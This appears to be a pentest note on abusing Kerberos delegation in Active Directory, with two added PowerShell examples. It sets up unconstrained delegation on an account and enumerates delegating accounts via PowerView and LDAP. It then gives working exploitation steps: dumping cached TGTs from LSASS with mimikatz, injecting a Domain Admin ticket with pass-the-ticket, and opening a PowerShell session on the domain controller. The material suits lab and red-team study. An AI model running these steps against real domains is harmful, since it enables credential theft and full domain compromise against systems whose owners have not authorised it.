Account delegation
Unconstrained delegation on an account
Make user y a service account by registering an SPN on it, then enable unconstrained delegation for the account. Registering the SPN alone does not grant delegation: it only makes the Delegation tab appear for the user in Active Directory Users and Computers, where "Trust this user for delegation to any service (Kerberos only)" sets the TRUSTED_FOR_DELEGATION flag in userAccountControl.
>setspn -U -A variant/golden y
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F398.png&width=768&dpr=4&quality=100&sign=38fb90ab&sv=1)
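The full lab setup, as an added example that is not part of the original note: the setspn step above plus the userAccountControl change that actually turns on unconstrained delegation, followed by a check. It assumes the RSAT ActiveDirectory module, Domain Admin rights, and the same user y, SPN variant/golden and domain zone.com used in the note.

```powershell
# Added lab-setup example (not from the original note). Assumes the RSAT
# ActiveDirectory module, Domain Admin rights, user 'y' in zone.com and the
# SPN 'variant/golden' from the note.
Import-Module ActiveDirectory

$User = 'y'
$Spn  = 'variant/golden'

# 1. Register the SPN so 'y' is a service account. Without an SPN the
#    Delegation tab does not even appear for the account in ADUC.
setspn -U -A $Spn $User

# 2. Enable unconstrained delegation. This sets TRUSTED_FOR_DELEGATION
#    (0x80000) in userAccountControl, the same bit the GUI option
#    "Trust this user for delegation to any service (Kerberos only)" sets.
Set-ADAccountControl -Identity $User -TrustedForDelegation $true

# 3. Verify both halves of the setup: the UAC bit and the SPN.
$Acct = Get-ADUser -Identity $User -Properties userAccountControl, servicePrincipalName, TrustedForDelegation
[PSCustomObject]@{
    SamAccountName       = $Acct.SamAccountName
    TrustedForDelegation = $Acct.TrustedForDelegation
    UacHasFlag           = [bool]($Acct.userAccountControl -band 0x80000)
    SPNs                 = ($Acct.servicePrincipalName -join ', ')
}
```

If UacHasFlag comes back $false after step 2, the account was not changed (usually insufficient rights on the object); the SPN by itself is harmless and the PowerView query below will not list the account.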
Enumerate domain accounts with unconstrained delegation, using PowerView
>Get-NetUser -Unconstrained -Domain zone.com
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F399.png&width=768&dpr=4&quality=100&sign=b3627932&sv=1)
Exploitation
Once a privileged user (for example a Domain Admin) has authenticated to the host where y's service runs, a forwarded copy of that user's TGT is cached in the host's LSASS next to the service's own tickets. With local administrator rights on that host, open mimikatz and export the tickets:
>privilege::debug
>sekurlsa::tickets /export
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F400.png&width=768&dpr=4&quality=100&sign=90df0ee3&sv=1)
Purge the tickets in the current logon session (mimikatz kerberos::purge), then inject the exported administrator TGT (kerberos::ptt with the .kirbi whose name contains the target user and krbtgt).
Obtain a PowerShell session on the domain controller as that user
> Enter-PSSession -ComputerName dc.zone.com
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F403.png&width=768&dpr=4&quality=100&sign=3734665c&sv=1)
Constrained delegation on an account
Enumerate users with constrained delegation
> Get-DomainUser -TrustedToAuth -Domain zone.com
Enumerate hosts with constrained delegation
> Get-DomainComputer -TrustedToAuth -Domain zone.com
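Both the unconstrained (Get-NetUser -Unconstrained) and constrained (-TrustedToAuth) queries above are LDAP filters underneath. As an added example that is not part of the original note or of PowerView, the same enumeration done with plain [adsisearcher] LDAP queries, so it runs on any domain-joined host without PowerView or RSAT. It goes a little beyond the note: it lists users and computers together, notes whether a constrained-delegation account also has protocol transition (the flag that lets it obtain tickets for arbitrary users without their involvement), and lists the accounts that are flagged so that delegation cannot impersonate them. It assumes only that the current user can read the directory, which any domain user can.

```powershell
# Added example (not from the original note, not PowerView). Plain LDAP via
# [adsisearcher] against the current domain; any domain user can run it.
$UF_TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation
$UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition ("use any authentication protocol")
$UF_NOT_DELEGATED                  = 0x100000   # "account is sensitive and cannot be delegated"
$BIT_AND = '1.2.840.113556.1.4.803'             # LDAP matching rule: bitwise AND

function Search-Ldap {
    param([string]$Filter, [string[]]$Props)
    $s = [adsisearcher]$Filter
    $s.PageSize = 1000
    foreach ($p in $Props) { [void]$s.PropertiesToLoad.Add($p) }
    $s.FindAll()
}

function Get-DelegationReport {
    $rows = @()

    # Unconstrained: TRUSTED_FOR_DELEGATION set. Domain controllers always carry
    # this bit, so members of Domain Controllers (primaryGroupID 516) are excluded.
    $f = "(&(userAccountControl:${BIT_AND}:=$UF_TRUSTED_FOR_DELEGATION)(!(primaryGroupID=516)))"
    foreach ($r in (Search-Ldap $f @('samaccountname'))) {
        $rows += [PSCustomObject]@{
            Type               = 'Unconstrained'
            Account            = $r.Properties['samaccountname'][0]
            Targets            = 'ANY'
            ProtocolTransition = $true   # no protocol restriction with unconstrained delegation
        }
    }

    # Constrained: msDS-AllowedToDelegateTo lists the SPNs the account may delegate to
    # (this is the attribute PowerView's -TrustedToAuth matches on).
    $f = '(msDS-AllowedToDelegateTo=*)'
    foreach ($r in (Search-Ldap $f @('samaccountname', 'msds-allowedtodelegateto', 'useraccountcontrol'))) {
        $uac = [int]$r.Properties['useraccountcontrol'][0]
        $rows += [PSCustomObject]@{
            Type               = 'Constrained'
            Account            = $r.Properties['samaccountname'][0]
            Targets            = (@($r.Properties['msds-allowedtodelegateto']) -join '; ')
            ProtocolTransition = [bool]($uac -band $UF_TRUSTED_TO_AUTH_FOR_DELEGATION)
        }
    }

    # Accounts that delegation cannot impersonate at all: the KDC refuses to issue
    # forwardable tickets for them, so their TGTs never reach a delegating host.
    $f = "(userAccountControl:${BIT_AND}:=$UF_NOT_DELEGATED)"
    foreach ($r in (Search-Ldap $f @('samaccountname'))) {
        $rows += [PSCustomObject]@{
            Type               = 'NotDelegated'
            Account            = $r.Properties['samaccountname'][0]
            Targets            = '-'
            ProtocolTransition = $false
        }
    }
    $rows
}

Get-DelegationReport | Sort-Object Type, Account | Format-Table -AutoSize
```

For the constrained rows, ProtocolTransition is the detail to look at first: with it set, the account can request a service ticket for any user to the listed SPNs on its own; without it, it can only delegate for users who authenticated to it with Kerberos.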
The exploitation method is covered later, in the persistence module.